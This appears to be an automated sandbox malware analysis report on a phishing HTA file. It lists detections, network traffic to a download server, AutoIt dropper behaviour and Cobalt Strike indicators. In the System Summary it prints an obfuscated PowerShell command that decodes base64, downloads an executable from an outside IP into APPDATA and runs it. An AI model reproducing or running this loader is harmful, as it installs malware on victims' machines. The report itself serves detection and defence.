Windows Analysis Report
seemejkiss.hta

AI detected suspicious sample

Source: Yara match	File source: 7.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.2350161997.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2350750527.0000000003950000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\win[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\winnit.exe	Joe Sandbox ML: detected

Phishing

Yara detected HtmlPhish44

Source: Yara match

File source: seemejkiss.hta, type: SAMPLE

Source:	Binary string: $]q8C:\Users\user\AppData\Local\Temp\5zyziwbf\5zyziwbf.pdb source: powershell.exe, 00000003.00000002.2180711036.00000000054E4000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: winnit.exe, 00000006.00000003.2185219526.00000000037E0000.00000004.00001000.00020000.00000000.sdmp, winnit.exe, 00000006.00000003.2184427306.0000000003640000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2313705453.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.2350802126.0000000003C9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2315536638.0000000003900000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.2350802126.0000000003B00000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: winnit.exe, 00000006.00000003.2185219526.00000000037E0000.00000004.00001000.00020000.00000000.sdmp, winnit.exe, 00000006.00000003.2184427306.0000000003640000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000007.00000003.2313705453.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.2350802126.0000000003C9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2315536638.0000000003900000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.2350802126.0000000003B00000.00000040.00001000.00020000.00000000.sdmp

Source: C:\Users\user\AppData\Roaming\winnit.exe	Code function: 6_2_00B1445A GetFileAttributesW,FindFirstFileW,FindClose,	6_2_00B1445A
Source: C:\Users\user\AppData\Roaming\winnit.exe	Code function: 6_2_00B1C6D1 FindFirstFileW,FindClose,	6_2_00B1C6D1
Source: C:\Users\user\AppData\Roaming\winnit.exe	Code function: 6_2_00B1C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	6_2_00B1C75C
Source: C:\Users\user\AppData\Roaming\winnit.exe	Code function: 6_2_00B1EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	6_2_00B1EF95
Source: C:\Users\user\AppData\Roaming\winnit.exe	Code function: 6_2_00B1F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	6_2_00B1F0F2
Source: C:\Users\user\AppData\Roaming\winnit.exe	Code function: 6_2_00B1F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	6_2_00B1F3F3
Source: C:\Users\user\AppData\Roaming\winnit.exe	Code function: 6_2_00B137EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	6_2_00B137EF
Source: C:\Users\user\AppData\Roaming\winnit.exe	Code function: 6_2_00B13B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	6_2_00B13B12
Source: C:\Users\user\AppData\Roaming\winnit.exe	Code function: 6_2_00B1BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	6_2_00B1BCBC

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2022050 - Severity 1 - ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 : 107.175.113.196:80 -> 192.168.2.5:49706
Source: Network traffic	Suricata IDS: 2022051 - Severity 1 - ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 : 107.175.113.196:80 -> 192.168.2.5:49706

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 07 Dec 2024 14:47:44 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12Last-Modified: Wed, 04 Dec 2024 08:38:39 GMTETag: "128400-6286db55d5857"Accept-Ranges: bytesContent-Length: 1213440Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 36 1c ad cf 72 7d c3 9c 72 7d c3 9c 72 7d c3 9c 34 2c 22 9c 70 7d c3 9c ec dd 04 9c 73 7d c3 9c 7f 2f 1c 9c 41 7d c3 9c 7f 2f 23 9c c3 7d c3 9c 7f 2f 22 9c 47 7d c3 9c 7b 05 40 9c 7b 7d c3 9c 7b 05 50 9c 57 7d c3 9c 72 7d c2 9c 52 7f c3 9c 0f 04 29 9c 22 7d c3 9c 0f 04 1c 9c 73 7d c3 9c 7f 2f 18 9c 73 7d c3 9c 72 7d 54 9c 73 7d c3 9c 0f 04 1d 9c 73 7d c3 9c 52 69 63 68 72 7d c3 9c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 18 15 50 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0c 00 00 de 08 00 00 a2 09 00 00 00 00 00 cd 7d 02 00 00 10 00 00 00 f0 08 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 f0 12 00 00 04 00 00 de 42 13 00 02 00 40 80 00 00 40 00 00 10 00 00 00 00 40 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4c a4 0b 00 7c 01 00 00 00 70 0c 00 88 fb 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 12 00 1c 71 00 00 c0 2b 09 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 48 0a 00 40 00 00 00 00 00 00 00 00 00 00 00 00 f0 08 00 84 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c4 dc 08 00 00 10 00 00 00 de 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 0e e1 02 00 00 f0 08 00 00 e2 02 00 00 e2 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 74 8f 00 00 00 e0 0b 00 00 52 00 00 00 c4 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 88 fb 05 00 00 70 0c 00 00 fc 05 00 00 16 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 1c 71 00 00 00 70 12 00 00 72 00 00 00 12 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Source: Joe Sandbox View

ASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS

Source: Network traffic

Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.5:49706 -> 107.175.113.196:80

Source: global traffic

HTTP traffic detected: GET /400/win.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 107.175.113.196Connection: Keep-Alive

Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.113.196
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.113.196
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.113.196
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.113.196
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.113.196
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.113.196
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.113.196
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.113.196
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.113.196
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.113.196
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.113.196
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.113.196
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.113.196
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.113.196
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.113.196
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.113.196
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.113.196
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.113.196
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.113.196
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.113.196
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.113.196
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.113.196
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.113.196
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.113.196
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.113.196
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.113.196
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.113.196
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.113.196
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.113.196
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.113.196
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.113.196
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.113.196
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.113.196
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.113.196
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.113.196
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.113.196
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.113.196
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.113.196
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.113.196
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.113.196
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.113.196
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.113.196
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.113.196
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.113.196
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.113.196
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.113.196
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.113.196
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.113.196
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.113.196
Source: unknown	TCP traffic detected without corresponding DNS query: 107.175.113.196

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Code function: 3_2_033E7A18 URLDownloadToFileW,

3_2_033E7A18

Source: global traffic

Source: powershell.exe, 00000003.00000002.2180711036.00000000054E4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://107.175.113.196/400/win.e
Source: powershell.exe, 00000003.00000002.2180711036.0000000005218000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://107.175.113.196/400/win.exe
Source: powershell.exe, 00000003.00000002.2187215317.0000000008892000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://107.175.113.196/400/win.exeV
Source: powershell.exe, 00000003.00000002.2182576683.000000000612A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000003.00000002.2180711036.0000000005218000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000003.00000002.2180711036.0000000005218000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000003.00000002.2180711036.00000000050C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000003.00000002.2180711036.0000000005218000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000003.00000002.2180711036.0000000005218000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000003.00000002.2180711036.00000000050C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000003.00000002.2180711036.0000000005218000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/winsvr-2022-pshelp
Source: powershell.exe, 00000003.00000002.2182576683.000000000612A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000003.00000002.2182576683.000000000612A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000003.00000002.2182576683.000000000612A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000003.00000002.2180711036.0000000005218000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000003.00000002.2184138928.00000000078B8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com32/WindowsPowerShell/v1.0/Modules/UEV/icrosoft.Uev.Commands.dll
Source: powershell.exe, 00000003.00000002.2182576683.000000000612A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe

Source: C:\Users\user\AppData\Roaming\winnit.exe

Code function: 6_2_00B24164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

6_2_00B24164

Source: C:\Users\user\AppData\Roaming\winnit.exe

Code function: 6_2_00B24164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

6_2_00B24164

Source: C:\Users\user\AppData\Roaming\winnit.exe

Code function: 6_2_00B23F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

6_2_00B23F66

Source: C:\Users\user\AppData\Roaming\winnit.exe

Code function: 6_2_00B1001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,

6_2_00B1001C

Source: C:\Users\user\AppData\Roaming\winnit.exe

Code function: 6_2_00B3CABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

6_2_00B3CABC

E-Banking Fraud

Detected Cobalt Strike Beacon

Source: Yara match	File source: 7.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.2350161997.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2350750527.0000000003950000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

System Summary

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe pOWErshEll -EX BYpasS -nOP -W 1 -c dEviCeCredENTIaLDeplOYmEnT ; iNvOke-ExPrEssioN($(inVOkE-EXPrESsiON('[SysTEm.tEXt.EncodinG]'+[CHAr]58+[ChAR]58+'UTf8.gEtSTRing([sYStEM.CoNVeRt]'+[CHAR]58+[Char]0x3a+'FRoMbasE64stRinG('+[chAr]0x22+'JG9ZdHRwUm5vICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbWJlUmRFZmluSXRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVcmxtb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ0NjYk9WYixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHZ2QktSVyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBiTUNmTnR4cCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDcVBpZ1RIQkosSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBCdFJmbmN1KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIkhmVUhiZkVLRUIiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtRXNwYUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB3c0FNS05icCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJG9ZdHRwUm5vOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3NS4xMTMuMTk2LzQwMC93aW4uZXhlIiwiJGVudjpBUFBEQVRBXHdpbm5pdC5leGUiLDAsMCk7U3RBcnQtc0xlRVAoMyk7SUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcd2lubml0LmV4ZSI='+[Char]0X22+'))')))"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe pOWErshEll -EX BYpasS -nOP -W 1 -c dEviCeCredENTIaLDeplOYmEnT ; iNvOke-ExPrEssioN($(inVOkE-EXPrESsiON('[SysTEm.tEXt.EncodinG]'+[CHAr]58+[ChAR]58+'UTf8.gEtSTRing([sYStEM.CoNVeRt]'+[CHAR]58+[Char]0x3a+'FRoMbasE64stRinG('+[chAr]0x22+'JG9ZdHRwUm5vICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbWJlUmRFZmluSXRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVcmxtb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ0NjYk9WYixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHZ2QktSVyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBiTUNmTnR4cCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDcVBpZ1RIQkosSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBCdFJmbmN1KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIkhmVUhiZkVLRUIiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtRXNwYUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB3c0FNS05icCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJG9ZdHRwUm5vOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3NS4xMTMuMTk2LzQwMC93aW4uZXhlIiwiJGVudjpBUFBEQVRBXHdpbm5pdC5leGUiLDAsMCk7U3RBcnQtc0xlRVAoMyk7SUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcd2lubml0LmV4ZSI='+[Char]0X22+'))')))"			Jump to behavior

Binary is likely a compiled AutoIt script file

Source: C:\Users\user\AppData\Roaming\winnit.exe	Code function: This is a third-party compiled AutoIt script.	6_2_00AB3B3A
Source: winnit.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: winnit.exe, 00000006.00000002.2186302265.0000000000B64000.00000002.00000001.01000000.0000000C.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_472efbc9-e
Source: winnit.exe, 00000006.00000002.2186302265.0000000000B64000.00000002.00000001.01000000.0000000C.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`	memstr_660abace-f
Source: win[1].exe.3.dr	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_98d76c9e-d
Source: win[1].exe.3.dr	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`	memstr_aac87086-2
Source: winnit.exe.3.dr	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_55dd69ee-c
Source: winnit.exe.3.dr	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`	memstr_d2ce6728-d

Powershell drops PE file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\win[1].exe			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\winnit.exe			Jump to dropped file

Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0042CD33 NtClose,	7_2_0042CD33
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B735C0 NtCreateMutant,LdrInitializeThunk,	7_2_03B735C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B72B60 NtClose,LdrInitializeThunk,	7_2_03B72B60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B72DF0 NtQuerySystemInformation,LdrInitializeThunk,	7_2_03B72DF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B74340 NtSetContextThread,	7_2_03B74340
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B73090 NtSetValueKey,	7_2_03B73090
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B73010 NtOpenDirectoryObject,	7_2_03B73010
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B74650 NtSuspendThread,	7_2_03B74650
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B72BA0 NtEnumerateValueKey,	7_2_03B72BA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B72B80 NtQueryInformationFile,	7_2_03B72B80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B72BF0 NtAllocateVirtualMemory,	7_2_03B72BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B72BE0 NtQueryValueKey,	7_2_03B72BE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B72AB0 NtWaitForSingleObject,	7_2_03B72AB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B72AF0 NtWriteFile,	7_2_03B72AF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B72AD0 NtReadFile,	7_2_03B72AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B739B0 NtGetContextThread,	7_2_03B739B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B72FB0 NtResumeThread,	7_2_03B72FB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B72FA0 NtQuerySection,	7_2_03B72FA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B72F90 NtProtectVirtualMemory,	7_2_03B72F90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B72FE0 NtCreateFile,	7_2_03B72FE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B72F30 NtCreateSection,	7_2_03B72F30
